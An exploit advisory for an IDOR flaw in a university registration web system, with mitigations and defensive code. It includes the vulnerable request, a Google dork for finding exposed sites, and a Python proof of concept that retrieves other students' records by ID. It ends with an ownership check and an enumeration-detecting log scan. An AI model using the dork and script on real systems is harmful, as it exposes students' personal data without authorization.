# Exploit Title: University Registration System - IDOR Leads to Information Disclosure
# Date: 2025-03-25
# Exploit Author: wa0_3/td9_l
# Telegram: @wa0_3/@td9_l
# Category: WebApps
# CVE: N/A
## Description:
An Insecure Direct Object Reference (IDOR) vulnerability was discovered in the University Registration System, allowing unauthorized users to access and modify registration details of other students by manipulating the `paramPgregistrationId` parameter.
## Vulnerable Endpoint:
```
GET Registration/PG/PG_Register.aspx?paramPgregistrationId=(id) HTTP/1.1
Host: target-university.edu
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: ASP.NET_SessionId=gky2cc33uoduykncb5mrz5e3
Connection: keep-alive
```
## Google Dork:
```
inurl:Registration/PG/PG_Register.aspx
```
## Proof of Concept (PoC):
```python
import argparse

import requests

parser = argparse.ArgumentParser(description='Exploit IDOR in University Registration System')
parser.add_argument('-url', help='Target URL (e.g., http://example.com)', required=True)
parser.add_argument('-id', help='Target Registration ID', required=True)
args = parser.parse_args()

# Join base URL and path explicitly so a base given without a trailing slash
# (as in the help text) still produces a valid URL.
url = f"{args.url.rstrip('/')}/Registration/PG/PG_Register.aspx?paramPgregistrationId={args.id}"
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "en-US,en;q=0.9",
    "Connection": "keep-alive"
}

response = requests.get(url, headers=headers)
if response.status_code == 200:
    print("[+] Exploit Successful!")
    print("[+] Response:")
    print(response.text)
else:
    print("[-] Exploit Failed")
```
## Impact:
An attacker can enumerate `paramPgregistrationId` values to view and potentially modify sensitive student registration details without authentication.
## Mitigation:
- Implement proper access control checks to ensure only authorized users can access their own data.
- Use session-based authentication to verify user privileges before serving sensitive data.
- Implement rate limiting and monitoring to detect abnormal access patterns.
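The first and third mitigation points, as an added example that is not part of the advisory or the affected product: an object-level ownership check of the kind the `PG_Register.aspx` handler lacks, and a log scan that flags sessions cycling through many distinct `paramPgregistrationId` values. The registration table, account names, session ids and log lines are all constructed for illustration.

```python
import re
from collections import defaultdict

PARAM_RE = re.compile(r"PG_Register\.aspx\?paramPgregistrationId=(\d+)")

# Constructed registration table: registration id -> owning student account.
REGISTRATIONS = {1001: "s.alice", 1002: "s.bob", 1003: "s.carol"}


def authorize_registration_view(session_user, requested_id, is_staff=False):
    """Object-level check the vulnerable page lacks: the id taken from the
    query string is only honoured if the record belongs to the session's user."""
    owner = REGISTRATIONS.get(requested_id)
    if owner is None:
        return False  # unknown id: deny rather than reveal whether it exists
    return is_staff or owner == session_user


# Constructed access-log lines (simplified W3C-style fields:
# client_ip session_id method path status); not taken from the advisory.
SAMPLE_LOG = """\
203.0.113.9 sess-attacker GET /Registration/PG/PG_Register.aspx?paramPgregistrationId=1001 200
203.0.113.9 sess-attacker GET /Registration/PG/PG_Register.aspx?paramPgregistrationId=1002 200
203.0.113.9 sess-attacker GET /Registration/PG/PG_Register.aspx?paramPgregistrationId=1003 200
203.0.113.9 sess-attacker GET /Registration/PG/PG_Register.aspx?paramPgregistrationId=1004 200
198.51.100.4 sess-student GET /Registration/PG/PG_Register.aspx?paramPgregistrationId=1002 200
198.51.100.4 sess-student GET /Registration/PG/PG_Register.aspx?paramPgregistrationId=1002 200
"""


def find_enumeration(log_text, threshold=3):
    """Flag sessions that requested `threshold` or more distinct registration
    ids; a legitimate student normally only touches their own record."""
    ids_by_session = defaultdict(set)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        match = PARAM_RE.search(fields[3])
        if match:
            ids_by_session[fields[1]].add(int(match.group(1)))
    return {sess: sorted(ids) for sess, ids in ids_by_session.items()
            if len(ids) >= threshold}


if __name__ == "__main__":
    print(authorize_registration_view("s.alice", 1002))  # False: not her record
    print(find_enumeration(SAMPLE_LOG))
```

The same ownership comparison belongs server-side in the page handler, keyed on the authenticated session rather than on anything the client supplies.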
## Credits:
Discovered by **wa0_3** (@wa0_3)